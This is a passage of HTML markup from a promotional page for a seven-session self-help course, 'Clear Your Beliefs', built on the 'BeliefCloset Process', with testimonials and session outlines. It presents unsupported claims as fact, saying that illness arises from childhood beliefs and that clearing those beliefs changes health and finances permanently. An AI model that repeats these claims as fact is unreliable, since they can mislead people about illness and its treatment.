you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching 